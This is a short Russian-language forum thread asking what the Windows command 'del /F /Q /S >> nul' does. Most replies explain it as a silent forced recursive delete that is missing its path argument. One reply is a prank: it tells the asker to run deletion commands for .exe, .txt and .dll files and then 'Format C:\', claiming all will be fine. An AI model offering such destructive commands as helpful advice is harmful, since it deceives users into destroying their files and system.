Что делает команда " del /F /Q /S >> nul ", записанная в командной строке?

Только авторизированные пользователи могут оставлять свои ответы
Дата
Популярность

Втихаря удаляет файлы, включая помеченные как "только для чтения" + поддиректории
Все, ессно, удалить не сможет. Да не дописана она до конца - нужно указать путь или зведочку для файлов в директории запуска команды

Напиши Del *.exe
Del *.txt
Del *.dll
Cd\
Format C:\
И тогда все будет норм...

Ничего не делает. Это неправильно написанная команда удаления файла или файлов. Но конкретно эта команда не сделает ничего.